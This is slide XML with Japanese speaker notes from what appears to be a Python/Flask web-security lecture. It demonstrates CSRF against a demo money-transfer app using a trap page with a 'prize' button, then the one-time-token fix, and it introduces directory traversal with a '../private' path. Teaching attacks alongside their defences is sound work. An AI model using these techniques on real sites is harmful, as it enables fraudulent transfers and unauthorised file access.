            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15341048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次に送金画面と確認画面です。ここで、二つとも注意すべきはログインされた証拠としてセッションが無い場合は無効にするようにします。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72</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8229309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ログイン画面の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>はこちらになります。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73</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38161367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送金画面の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>はこのようになっています。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74</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19079988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それでは実際にやってみます。まずは実行してブラウザからログインをします。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75</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11173617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ログインしたらセッションによって利用者の名前が表示されます。そのあとこのように入力します。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76</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4864877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すると入力した通りに振り込まれたことを表示されます。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77</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35851028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では次に罠となるサイトを作成します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードはこのようにします。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78</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31573044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作成したら、今度は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイルをそのまま開き、景品</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET!!</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>をクリックします。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79</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2019804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では、不正アクセスの仕組みに入る前に、まず、今までの講座の補足をします。第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回まででは、外部からデータを入力されたものや、データベースの内容を表示する際に、必ず</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いていたことや、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を実行する際に、プレースホルダを使用していたのは、最低限しないといけないセキュリティ対策の一つだったからです。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のプログラミング手法の通り、文字列を連結することでもプログラムは動きますが、それではセキュリティ上の問題が発生します。最初二つの、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションは、まさしくこれを利用します。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8</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13809551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すると、先ほど作成した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の内容が送信され、なおかつセッションに使うクッキーがブラウザに保存されているため、振込者はログインをしたユーザになっています。このように、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>では攻撃者がログインをする必要性がない事が一つの特徴です。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80</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18898848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ここまで、攻撃手法でしたが、今度は対策について説明します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>は、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と、使用するパラメータさえ知っていれば誰でもアクセスできてしまう事が根本的な原因です。そこで、正常なサイトの方でランダムな文字列になるワンタイムトークンを作成して、それを送信前のページの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とセッションに入れて、送信後のページでセッションとパラメータの値で照合し、合致した場合にのみ処理を行います。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81</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11222698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それでは実際に対策をしていきます。ライブラリのインポートで、元々セッション発行のために使用していましたが、使用するライブラリは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>です。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82</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33546426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次に入力画面でトークンを作成し、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とセッションに格納します。そして送信された画面でパラメータとセッションの値が同じ場合にのみ処理を行います。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83</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19169518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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ではトークンを入れるための</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を追加します。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84</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41122018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それでは対策をしたプログラムでもう一回実行します。まず正規の手続きで送金をします。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85</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9668103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すると正規の手続きでは送金ができます。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86</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41099510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では今度は罠サイトからボタンを押してアクセスします。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87</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21160002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すると今度はトークンを格納するパラメータが無いため、ブラウザでは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Bad Request</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が表示されます。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88</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11733544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ここで、入力画面をブラウザで右クリックしてソースコードを表示します。すると</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>行目にランダムな</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>進数が表示されていることがわかります。補足しておくと、この文字列はアクセスされるごとに変わるため、一度ソースコードを表示すると文字列が異なるため、処理がされなくなります。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89</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1543181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また、冒頭でも説明しましたが、第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回までの内容でサーバ側の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サービスプログラムに最低限必要な知識はある低度理解できたのではないかと思います。しかし、どれほど良いサービスを作っても脆弱性があれば、人気や信用が一気に無くなる可能性があります。そこで、セキュリティ対策をすることでサービスを安心して使ってもらうようにし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9</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25475016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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策を適用する場所ですが、どこでも適用すればいいわけではありません。適用する場合は主に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でデータを送る時などの特徴であるデータの変更・追加・削除など何らかの形でデータが変わる時に用います。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90</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24262609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それでは次にディレクトリトラバーサルです。この攻撃手法はファイル名を扱うプログラムに特殊な文字列を送信することで通常ならアクセスできないファイルやフォルダの内容を取得することができます。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91</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36727799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ィレクトリトラバーサルの仕組みとしては、ファイル名を何らかの形で入力する時に、プログラムでファイルを開く際にファイル操作用の特殊な文字列を使うことで使用するフォルダを移動させることで、できるようにな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92</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7342743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それでは仕組みを説明するために、まずフォルダとファイルを用意します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使用する時に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>templates</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>をプログラムと同じフォルダに作っていましたが、今度は同じ位置に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>というフォルダを作ります。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の中にはフォルダ名「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を作り、作成したフォルダの中にそれぞれテキストファイルを作ります。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93</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34839162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テキストファイルの内容はとりあえずそのフォルダの意味合いが分かるように内容を作ります。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94</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32844167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Other</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>についても同様です。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95</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15054484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それでは実際にアクセスをしてみます。まずは正常なアクセスです。変数名</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>dire</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でフォルダを指し、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でファイル名を入れます。その後、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でファイルの内容とパスを週釣緑します。すると、このようにファイルを開き、パスが出力されます。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96</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2101584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次に不正アクセスに使われる手法をやります。今度は、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>という変数にピリオドを二つつけて、スラッシュでフォルダ名</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を入れ、ファイル名に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とします。すると、別のフォルダを開くことができ、右下の内容を見ると分かるように、ファイルへのパスが変わっていることが分かります。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97</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10729410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ディレクトリトラバーサルをされると想定される代表的な被害について紹介します。まず、ホームページを運営するサイトの保有している情報資産や個人情報が漏洩したり改ざんされるなどが分かりやすいと思います。他にも、プログラムや設定、データを漏洩、改ざんされ、予期しない挙動をするように書き換えられたり侵入ん手がかりにされること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98</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39725721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それでは実際にサービスを作成してディレクトリトラバーサルをやってみます。ファイルをレスポンスする時は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>send_file</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でパスをしていします。この時、使用するフォルダのパスとファイル名をそのまま入れます。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="スライド番号プレースホルダー 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8BCF7746-C7A6-4E0B-AF12-DE70F15F6DDC}" type="slidenum">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418371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F54199-3A31-8AFA-8ED8-D0A02429E63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4E25689-2394-CA10-618A-E468970A7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4DFE4E-7F19-3DB4-8DDC-FF6694606A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}"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00AC64D9-5354-F776-CA5B-894B119A3A4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AF74EF-9D77-35AD-91B9-BC4CBA92A07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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799640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29D5D2-3CD4-D8EE-583B-A54FB24AE77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11CBCA-7DD3-F150-428B-22055E9E925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EA0284-99B0-16E6-BFAE-F3F19FB79205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}"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8996A94B-8404-9338-77CB-C391D1B2153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71121F-BB1B-09CF-28AB-E6501C8F012A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
